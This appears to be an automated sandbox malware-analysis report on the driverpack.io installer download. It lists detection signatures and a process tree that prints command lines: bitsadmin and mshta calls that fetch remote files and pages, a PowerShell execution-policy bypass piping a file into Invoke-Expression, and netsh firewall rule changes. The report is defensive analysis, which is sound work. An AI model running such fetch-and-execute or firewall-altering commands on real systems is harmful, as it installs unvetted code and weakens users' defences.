Create Interactive Tour

Windows Analysis Report
https://driverpack.io/en

Overview

General Information

Sample URL:https://driverpack.io/en
Analysis ID:1298587
Infos:

Detection

Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Sigma detected: Dot net compiler compiles file from suspicious location
Submitted sample is a known malware sample
Downloads suspicious files via Chrome
Uses netsh to modify the Windows network and firewall settings
Tries to download files via bitsadmin
Writes or reads registry keys via WMI
Bypasses PowerShell execution policy
Modifies Internet Explorer zone settings
Obfuscated command line found
Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
Modifies the windows firewall
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Suspicious execution chain found
Queries sensitive battery information (via WMI, Win32_Battery, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Searches for the Microsoft Outlook file path
Drops PE files
Compiles C# or VB.Net code
Creates or modifies windows services
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 7zip to decompress a password protected archive

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64_ra
  • chrome.exe (PID: 6220 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://driverpack.io/en MD5: C817D9E0D995276EC89E4C89AFC19694)
    • chrome.exe (PID: 6924 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 --field-trial-handle=1956,i,15950142881014853540,921028854998315971,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: C817D9E0D995276EC89E4C89AFC19694)
    • mshta.exe (PID: 1740 cmdline: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\Downloads\PROD_Start_DriverPack.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} MD5: 665D512BB2727713783B73F1B7FEB808)
      • cmd.exe (PID: 6864 cmdline: C:\Windows\System32\cmd.exe" /c bitsadmin /transfer dwnl-task-48795 /download /priority foreground http://dwrapper-dev.herokuapp.com/beetle-cab.cab "C:\Users\user\AppData\Local\Temp\dwnl_48795\dwnl_beetle-cab.cab" | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\user\AppData\Local\Temp\dwnl_48795\log_bits_start.txt MD5: 4943BA1A9B41D69643F69685E35B2943)
        • conhost.exe (PID: 5720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: C5E9B1D1103EDCEA2E408E9497A5A88F)
        • bitsadmin.exe (PID: 7964 cmdline: bitsadmin /transfer dwnl-task-48795 /download /priority foreground http://dwrapper-dev.herokuapp.com/beetle-cab.cab "C:\Users\user\AppData\Local\Temp\dwnl_48795\dwnl_beetle-cab.cab" MD5: 81F910AD326B38EA6546E51173D75B2C)
        • findstr.exe (PID: 1576 cmdline: findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" MD5: 632DF50AB80EB40B6D3D05392A231A14)
        • findstr.exe (PID: 3380 cmdline: findstr /R /V "^$" MD5: 632DF50AB80EB40B6D3D05392A231A14)
      • cmd.exe (PID: 424 cmdline: C:\Windows\System32\cmd.exe" /c powershell Get-MpComputerStatus > "C:\Users\user\AppData\Local\Temp\dwnl_48795\log_defenderVersionPowershell.txt MD5: 4943BA1A9B41D69643F69685E35B2943)
        • conhost.exe (PID: 5684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: C5E9B1D1103EDCEA2E408E9497A5A88F)
        • powershell.exe (PID: 7208 cmdline: powershell Get-MpComputerStatus MD5: BCC5A6493E0641AA1E60CBF69469E579)
      • cmd.exe (PID: 7304 cmdline: C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-48795 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\user\AppData\Local\Temp\dwnl_48795\log_bits_info.txt MD5: 4943BA1A9B41D69643F69685E35B2943)
        • conhost.exe (PID: 5984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: C5E9B1D1103EDCEA2E408E9497A5A88F)
        • bitsadmin.exe (PID: 4052 cmdline: bitsadmin /info dwnl-task-48795 MD5: 81F910AD326B38EA6546E51173D75B2C)
        • findstr.exe (PID: 5432 cmdline: findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" MD5: 632DF50AB80EB40B6D3D05392A231A14)
        • findstr.exe (PID: 540 cmdline: findstr /R /V "^$" MD5: 632DF50AB80EB40B6D3D05392A231A14)
      • cmd.exe (PID: 7316 cmdline: C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-48795 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\user\AppData\Local\Temp\dwnl_48795\log_bits_info.txt MD5: 4943BA1A9B41D69643F69685E35B2943)
        • conhost.exe (PID: 7352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: C5E9B1D1103EDCEA2E408E9497A5A88F)
        • bitsadmin.exe (PID: 6844 cmdline: bitsadmin /info dwnl-task-48795 MD5: 81F910AD326B38EA6546E51173D75B2C)
        • findstr.exe (PID: 5032 cmdline: findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" MD5: 632DF50AB80EB40B6D3D05392A231A14)
        • findstr.exe (PID: 7088 cmdline: findstr /R /V "^$" MD5: 632DF50AB80EB40B6D3D05392A231A14)
      • cmd.exe (PID: 7768 cmdline: C:\Windows\System32\cmd.exe" /c expand "C:\Users\user\AppData\Local\Temp\dwnl_48795\dwnl_beetle-cab.cab" -F:* C:\Users\user\AppData\Local\Temp > "C:\Users\user\AppData\Local\Temp\dwnl_48795\log_expand.txt MD5: 4943BA1A9B41D69643F69685E35B2943)
        • conhost.exe (PID: 7784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: C5E9B1D1103EDCEA2E408E9497A5A88F)
        • expand.exe (PID: 3308 cmdline: expand "C:\Users\user\AppData\Local\Temp\dwnl_48795\dwnl_beetle-cab.cab" -F:* C:\Users\user\AppData\Local\Temp MD5: 8C2235852F8C2659EB6CA4A0C6B3B3F1)
      • cmd.exe (PID: 6200 cmdline: C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe x -y -aoa -pbeetle "C:\Users\user\AppData\Local\Temp\beetle-cab\arc.7z" -o"C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack" > "C:\Users\user\AppData\Local\Temp\dwnl_48795\log_7zip.txt MD5: 4943BA1A9B41D69643F69685E35B2943)
        • conhost.exe (PID: 5400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: C5E9B1D1103EDCEA2E408E9497A5A88F)
        • 7za.exe (PID: 7684 cmdline: C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe x -y -aoa -pbeetle "C:\Users\user\AppData\Local\Temp\beetle-cab\arc.7z" -o"C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack" MD5: 90AAC6489F6B226BF7DC1ADABFDB1259)
      • cmd.exe (PID: 4724 cmdline: C:\Windows\System32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\start.bat" && echo %errorlevel% > "C:\Users\user\AppData\Local\Temp\dwnl_48795\log_runAsAdmin.txt MD5: 4943BA1A9B41D69643F69685E35B2943)
        • conhost.exe (PID: 3672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: C5E9B1D1103EDCEA2E408E9497A5A88F)
        • cmd.exe (PID: 7536 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\start.bat" MD5: 4943BA1A9B41D69643F69685E35B2943)
          • conhost.exe (PID: 7556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: C5E9B1D1103EDCEA2E408E9497A5A88F)
          • mshta.exe (PID: 6216 cmdline: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\run.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} --sfx MD5: 665D512BB2727713783B73F1B7FEB808)
            • cmd.exe (PID: 5344 cmdline: C:\Windows\System32\cmd.exe" /C powershell -NonInteractive -NoLogo -NoProfile -ExecutionPolicy Bypass "Get-Content 'C:\Users\user\AppData\Roaming\DRPSu\temp\ps.lluon6kn.jqa89.cmd.txt' -Wait | Invoke-Expression" > "C:\Users\user\AppData\Roaming\DRPSu\temp\ps.lluon6kn.jqa89.stdout.log" 2> "C:\Users\user\AppData\Roaming\DRPSu\temp\ps.lluon6kn.jqa89.stderr.log MD5: 4943BA1A9B41D69643F69685E35B2943)
              • conhost.exe (PID: 7908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: C5E9B1D1103EDCEA2E408E9497A5A88F)
              • powershell.exe (PID: 3088 cmdline: powershell -NonInteractive -NoLogo -NoProfile -ExecutionPolicy Bypass "Get-Content 'C:\Users\user\AppData\Roaming\DRPSu\temp\ps.lluon6kn.jqa89.cmd.txt' -Wait | Invoke-Expression" MD5: BCC5A6493E0641AA1E60CBF69469E579)
                • csc.exe (PID: 6984 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\e2ligmzk\e2ligmzk.cmdline MD5: 3C73132E652D88F4BEA6A830D44BBCDE)
                  • cvtres.exe (PID: 4844 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC4A9.tmp" "c:\Users\user\AppData\Local\Temp\e2ligmzk\CSCD3ADA2B05B0248E496F87BE664C3E88D.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
            • rundll32.exe (PID: 8164 cmdline: rundll32 kernel32,Sleep MD5: D0432468FA4B7F66166C430E1334DBDA)
            • cmd.exe (PID: 6140 cmdline: C:\Windows\System32\cmd.exe" /c "netsh advfirewall firewall delete rule name="DriverPack aria2c.exe" || echo Done & call echo Done %^errorLevel% > "C:\Users\user\AppData\Roaming\DRPSu\temp\run_command_8360.txt" MD5: 4943BA1A9B41D69643F69685E35B2943)
              • conhost.exe (PID: 2424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: C5E9B1D1103EDCEA2E408E9497A5A88F)
              • netsh.exe (PID: 408 cmdline: netsh advfirewall firewall delete rule name="DriverPack aria2c.exe" MD5: 718A726FCC5EFCE3529E7A244D87F13F)
            • cmd.exe (PID: 6308 cmdline: C:\Windows\System32\cmd.exe" /c "netsh advfirewall firewall add rule name="DriverPack aria2c.exe" dir=in action=allow program="C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\tools\aria2c.exe" || echo Done & call echo Done %^errorLevel% > "C:\Users\user\AppData\Roaming\DRPSu\temp\run_command_84501.txt" MD5: 4943BA1A9B41D69643F69685E35B2943)
              • conhost.exe (PID: 6768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: C5E9B1D1103EDCEA2E408E9497A5A88F)
              • netsh.exe (PID: 7088 cmdline: netsh advfirewall firewall add rule name="DriverPack aria2c.exe" dir=in action=allow program="C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\tools\aria2c.exe" MD5: 718A726FCC5EFCE3529E7A244D87F13F)
            • cmd.exe (PID: 5720 cmdline: C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/intro.mp3" -o "C:\Users\user\AppData\Roaming\DRPSu\temp\wget_log_68896.log" & echo DONE > "C:\Users\user\AppData\Roaming\DRPSu\temp\wget_finished_68896.txt" MD5: 4943BA1A9B41D69643F69685E35B2943)
              • conhost.exe (PID: 7728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: C5E9B1D1103EDCEA2E408E9497A5A88F)
              • driverpack-wget.exe (PID: 7836 cmdline: "tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/intro.mp3" -o "C:\Users\user\AppData\Roaming\DRPSu\temp\wget_log_68896.log" MD5: BD126A7B59D5D1F97BA89A3E71425731)
            • cmd.exe (PID: 8116 cmdline: C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/START-INITIAL-1.mp3" -o "C:\Users\user\AppData\Roaming\DRPSu\temp\wget_log_40078.log" & echo DONE > "C:\Users\user\AppData\Roaming\DRPSu\temp\wget_finished_40078.txt" MD5: 4943BA1A9B41D69643F69685E35B2943)
              • conhost.exe (PID: 4980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: C5E9B1D1103EDCEA2E408E9497A5A88F)
              • driverpack-wget.exe (PID: 5532 cmdline: "tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/START-INITIAL-1.mp3" -o "C:\Users\user\AppData\Roaming\DRPSu\temp\wget_log_40078.log" MD5: BD126A7B59D5D1F97BA89A3E71425731)
            • cmd.exe (PID: 4340 cmdline: C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/START-LOADED-1.mp3" -o "C:\Users\user\AppData\Roaming\DRPSu\temp\wget_log_58899.log" & echo DONE > "C:\Users\user\AppData\Roaming\DRPSu\temp\wget_finished_58899.txt" MD5: 4943BA1A9B41D69643F69685E35B2943)
              • conhost.exe (PID: 3240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: C5E9B1D1103EDCEA2E408E9497A5A88F)
              • driverpack-wget.exe (PID: 1272 cmdline: "tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/START-LOADED-1.mp3" -o "C:\Users\user\AppData\Roaming\DRPSu\temp\wget_log_58899.log" MD5: BD126A7B59D5D1F97BA89A3E71425731)
            • cmd.exe (PID: 6052 cmdline: C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/START-SETUP-1.mp3" -o "C:\Users\user\AppData\Roaming\DRPSu\temp\wget_log_70521.log" & echo DONE > "C:\Users\user\AppData\Roaming\DRPSu\temp\wget_finished_70521.txt" MD5: 4943BA1A9B41D69643F69685E35B2943)
              • conhost.exe (PID: 6372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: C5E9B1D1103EDCEA2E408E9497A5A88F)
              • driverpack-wget.exe (PID: 6908 cmdline: "tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/START-SETUP-1.mp3" -o "C:\Users\user\AppData\Roaming\DRPSu\temp\wget_log_70521.log" MD5: BD126A7B59D5D1F97BA89A3E71425731)
      • mshta.exe (PID: 7716 cmdline: C:\Windows\system32\mshta.exe" "http://dwrapper-prod.herokuapp.com/bin/watcher.html MD5: 665D512BB2727713783B73F1B7FEB808)
  • cleanup
No yara matches

Data Obfuscation

barindex
Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\e2ligmzk\e2ligmzk.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\e2ligmzk\e2ligmzk.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: powershell -NonInteractive -NoLogo -NoProfile -ExecutionPolicy Bypass "Get-Content 'C:\Users\user\AppData\Roaming\DRPSu\temp\ps.lluon6kn.jqa89.cmd.txt' -Wait | Invoke-Expression" , ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3088, ParentProcessName: powershell.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\e2ligmzk\e2ligmzk.cmdline, ProcessId: 6984, ProcessName: csc.exe
No Snort rule has matched

Click to jump to signature section

Show All Signature Results
Source: https://driverpack.io/enHTTP Parser: No favicon
Source: https://driverpack.io/enHTTP Parser: No favicon
Source: https://driverpack.io/enHTTP Parser: No favicon
Source: https://driverpack.io/enHTTP Parser: No favicon
Source: https://googleads.g.doubleclick.net/pagead/html/r20230823/r20190131/zrt_lookup.htmlHTTP Parser: No favicon
Source: https://driverpack.io/enHTTP Parser: No favicon
Source: https://driverpack.io/enHTTP Parser: No favicon
Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\GoogleUpdater
Source: C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exeFile opened: C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\img\assistant-faces\chat
Source: C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exeFile opened: C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\img\assistant-chat
Source: C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exeFile opened: C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\img\
Source: C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exeFile opened: C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\img\assistant-faces
Source: C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exeFile opened: C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\img\assistant-faces\
Source: C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exeFile opened: C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\img\assistant-faces\start-screen

Software Vulnerabilities

barindex
Source: C:\Program Files\Google\Chrome\Application\chrome.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

System Summary

barindex
Source: C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exeDropped file: MD5: bd126a7b59d5d1f97ba89a3e71425731 Family: Gamaredon Group Description: Gamaredon is labeled by Palo Alto and has been active since at least 2013. It primarily makes use of compromised domains, dynamic DNS providers, Russian and Ukrainian country code top-level domains (ccTLDs), and Russian hosting providers to distribute their custom-built malware. The attack group heavily relies on off-the-shelf tools in the beginning, then makes a shift to custom-developed malware which indicates the improvement of technical capabilities. References: https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/ https://www.lookingglasscyber.com/operation-armageddon-registration/https://blog.yoroi.company/research/the-russian-shadow-in-eastern-europe-ukrainian-mod-campaign/https://blog.yoroi.company/research/the-russian-shadow-in-eastern-europe-a-month-later/Data Source: https://github.com/RedDrip7/APT_Digital_Weapon
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile dump: C:\Users\user\Downloads\PROD_Start_DriverPack.hta (copy)Jump to dropped file
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
